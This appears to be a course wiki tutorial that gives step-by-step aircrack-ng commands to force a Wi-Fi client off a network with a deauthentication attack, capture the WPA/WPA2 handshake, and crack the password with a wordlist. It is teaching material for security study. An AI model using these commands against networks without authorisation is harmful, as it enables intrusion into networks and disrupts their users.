WPA/WPA2 PSK deauthentication attack
Jump to navigation
Jump to search
Summary
How to sniff a WPA/WPA2 handshake using a deauthentication attack and use aircrack-ng to crack the password.
Requirements and Tools
- Operating system: Ubuntu 18.04 bionic amd64
- Aircrack-ng
Description
Put your interface in monitor mode
- Use airmon-ng to put interface in monitor mode
airmon-ng PHY Interface Driver Chipset phy0 wlan0 iwlwifi Intel Corporation Wireless 7260 (rev 83)
- First we need to set interface in monitor mode `iw wlan0 del` and execute the command :
airmon-ng Found phy0 with no interfaces assigned, would you like to assign one to it? [y/n] y PHY Interface Driver Chipset phy0 wlan0mon iwlwifi Intel Corporation Wireless 7260 (rev 83)
- Kill all processes which use physical device
airmon-ng check kill Killing these processes: PID Name 895 wpa_supplican
- Start in monitor mode
airmon-ng start wlan0mon 9
Check needed MAC addresses
- using wireshark or airodump-ng
airodump-ng wlan0mon
- You will need:
- BSSID (MAC address of access point): <bssid>
- Access point channel: <channel>
- MAC address of a victim, wireless client using WPA2
Capture handshake
- Get handshake or connected station
airodump-ng -c <channel> --bssid <bssid> -w psk wlan0mon
if no there is no handshake captured you need to get the MAC address of a victim and deauthenticate
- Deauthenticate using airreplay-ng
aireplay-ng -0 1 -a <bssid> -c <victim mac address> wlan0mon
-0 means deauthentication 1 number of deauthentication frames sent -a bssid mac address -c victim mac address to deauthenticate
- examine handshake with wireshark filter eapol messages
Crack with aircrack-ng
- download a password list from somewhere https://github.com/danielmiessler/SecLists/blob/master/Passwords/ and issue following aircrack-ng command to crack the password
aircrack-ng -w <passwordlist path> -b <bssd> psk*.cap
Reset network configuration
do not forget to turn off monitor mode and restart network manager
- Stop monitor mode
airmon-ng stop wlan0mon
- Restart network manager for internet access
service network-manager restart
Used Hardware
Notebook with Wifi interface card
Courses
- CCST 21.06.2019 (2019)